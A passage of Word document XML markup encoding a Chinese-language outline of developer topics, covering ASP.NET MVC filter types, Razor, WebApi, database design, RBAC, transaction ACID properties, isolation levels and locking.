          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Filter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IAuthenticationFilter(验证过滤器 MVC5)验证是否合理请求，是否合理用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IAuthorizationFilter(授权过滤器)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AuthorizeAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RequireHttpsAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ValidateAntiForgeryTokenAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ChildActionOnlyAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IActionFilter(动作过滤器-前-后)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ActionFilterAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IResultFilter(结果过滤器-前-后)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ActionFilterAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>IExceptionFilter(例外过滤器)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HandleErrorAttribute(在FilterConfig就已被注册)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RazorViewEngine视图引擎</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>WebApi</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数据库技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库服务端、客户端、图形界面管理工具、数据库语言（PL-sql,T-sql,sql）、数据库安全等概念</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>视图、存储过程、游标、中间表、触发器、计划任务等常用技术</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库分库、拆表、分布式、集群、备份、故障调控等方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库三大范式与反范式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RBAC（Role-Based Access Control，基于角色的访问控制）权限模型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:left="450"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>数据库机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>索引</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>存储引擎</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>事务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>四大特性(ACID)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>原子性 Atomicity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一致性 Consistency</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>隔离性 Isolation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>持续性 Durability</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>并发产生的问题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>脏读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>幻读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不可重复读</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>解决方案—隔离级别</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读未提交Read uncommitted</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>读已提交Read committed (mssql、oracle)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>可重复读Repeatable read（mysql）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="1800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>串行化Serializable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>锁机制</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="1350"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>种类、粒度、加锁方式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
